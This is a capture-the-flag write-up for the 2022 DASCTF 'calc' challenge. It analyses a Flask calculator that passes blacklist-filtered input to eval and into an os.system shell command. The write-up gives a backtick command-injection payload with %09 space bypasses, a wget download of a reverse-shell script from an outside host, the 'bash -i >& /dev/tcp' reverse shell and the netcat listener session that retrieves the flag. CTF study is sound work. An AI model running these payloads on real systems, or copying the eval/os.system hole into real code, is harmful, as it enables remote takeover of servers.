2022 DASCTF calc Analysis

Opening the challenge shows a calculator; if I'm not mistaken, it should come down to RCE.

Source Code Analysis

#coding=utf-8
from flask import Flask,render_template,url_for,render_template_string,redirect,request,current_app,session,abort,send_from_directory
import random
from urllib import parse
import os
from werkzeug.utils import secure_filename
import time

app=Flask(__name__)

def waf(s):
    # Substring blacklist; note that backticks and '#' are not in it
    blacklist = ['import','(',')',' ','_','|',';','"','{','}','&','getattr','os','system','class','subclasses','mro','request','args','eval','if','subprocess','file','open','popen','builtins','compile','execfile','from_pyfile','config','local','self','item','getitem','getattribute','func_globals','__init__','join','__dict__']
    flag = True
    for no in blacklist:
        if no.lower() in s.lower():
            flag= False
            print(no)
            break
    return flag

@app.route("/")
def index():
    "欢迎来到SUctf2022"
    return render_template("index.html")

@app.route("/calc",methods=['GET'])
def calc():
    ip = request.remote_addr
    num = request.values.get("num")
    # num is interpolated unescaped into a shell command string
    log = "echo {0} {1} {2}> ./tmp/log.txt".format(time.strftime("%Y%m%d-%H%M%S",time.localtime()),ip,num)

    if waf(num):
        try:
            data = eval(num)
            os.system(log)  # the shell command built from num is executed here
        except:
            pass
        return str(data)
    else:
        return "waf!!"

if __name__ == "__main__":
    app.run(host='0.0.0.0',port=5000)

Many characters and functions commonly used in commands are filtered, so there is little room for template injection here; the focus is therefore on os.system(). On the other hand, the backtick commonly used in Linux commands is not filtered, and Python's comment character # also survives. Since eval() evaluates a Python string expression, to keep it from raising an error the Linux command appended after it has to be commented out with #.

Constructing the Payload

Since many characters are filtered and the command output is not echoed back, use wget to download an sh file containing a reverse shell, then run it.

Spaces can be bypassed with %09; > and other tricks also work, no need to elaborate.

Upload a shell file like this to a website:

bash -i >& /dev/tcp/{IP}/{PORT} 0>&1

Have the target machine save it under /tmp, then execute it:

num=7*7%23`wget%09-P%09/tmp%09http://vveelin.com.cn:89/bsh.sh`
num=7*7%23`sh%09/tmp/bsh.sh`

Listen on the corresponding port on the attacking machine and get a shell:

[root@ecs-394098 ~]# nc -lvnp 4444
Ncat: Connection from 117.21.200.166.
Ncat: Connection from 117.21.200.166:62378.
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell

root@out:/# cat Th1s_is__F1114g
cat Th1s_is__F1114g
flag{16c2218b-4113-411e-b64a-30dd12604d3c}